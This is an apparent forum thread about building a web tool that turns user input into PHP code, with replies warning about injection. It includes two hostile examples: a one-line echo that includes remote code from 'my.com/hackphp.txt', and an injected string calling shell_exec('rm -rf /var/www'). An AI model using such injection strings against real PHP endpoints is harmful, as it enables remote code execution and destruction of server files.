PHP Code Executer

[fileserverdirect]

Sorry for the late post (I was away from the computer for a while, long story).
-----
The echo that I mentchend was in the text box. So after the user clicked "Generate", a text box appeared containing:

PHP Code:

<textarea>
<?\php
//--------------------------------
//CODE GENERATED BY: so-and-so
//Vist us at http://A-URL-HERE.com
//You MAY remove this notice
//--------------------------------
echo 'Some text that the user inputed above';
\?>
</textarea>

NOTE: the slash before <?\php and \?> will disappear when echoed out by the main script and prevent the textarea from saying "Some text that the user inputed above"
I was origanly going to do this in javascript, but in case the user did not have JS installed on their computer... It would be alot cooler in php. I do not want to refresh the page, as soon as the user hits generate, boom, a text box appeard. I tryed some stuff like a whlie($user_submited="yes") etc. but it never worked, It ether sent it into and endless loop, or it didn't work, This could be a new thread, but it is still related to my problem.

[djr33]

echo 'ha'.include('http://my.com/hackphp.txt')?'!';

Anyway, Twey is right.

As for what you're talking about now, the only way to make this work would be to write, from scratch, your own PHP parser. Wouldn't be impossible, but it would be complex, fast, as you started adding functions. Additionally, since you couldn't allow many things for security, it would be a waste, in some ways.


PHP is a server side language. The only way to make it work without refreshing using PHP is to use javascript to load the PHP data and display it (ie, Ajax), or you could use an iframe, etc.

[fileserverdirect]

You are forgetting this post:

Well then I will just eregi for it and the echo will be enclosed in single quotes so no code can be exicuted and if they try to type a " ' . shell_exec('rm -rf /var/www') . ' " I will check for a single quote and place a "\" before it, and if they try to double slash, a slash will be takken off. If there is any more suggestions, please post.

Now my reply to a quote:

PHP is a server side language. The only way to make it work without refreshing using PHP is to use javascript to load the PHP data and display it (ie, Ajax), or you could use an iframe, etc.

I like the IFRAME Idea but then I would have to give up my HTML 4.1 STRICT Status, unless I get tricky and use javascript to diplay it but that would be dishonest . Ah well, I will stick to javascript generating the code, and the people who don't have javascript, ah well, they will just have to deal with it
P.S. how do you highlight the code like you did above?

[djr33]

I was just noting that there's a very simple one line way to hack that, even if you only allowed an echo statement. Using eregi replace would stop it, yes.

the people who don't have javascript, ah well, they will just have to deal with it

Same if you were to use Ajax or a javascript generated iframe. And, anyone with iframes probably has javascript too (though it could be disabled).

[fileserverdirect]

So what I was saying was right?
Also the Hello World script creater was just a simple example. I can get into more complex stuff, from if statements, to custom functions, to anything else php. Well I am going to go with the javascript version, mainly because it does not use frames or php, all client side, I guess is the safest.

[djr33]

PHP in this case would have no advantage either, as you will be rewriting a limited parser from scratch.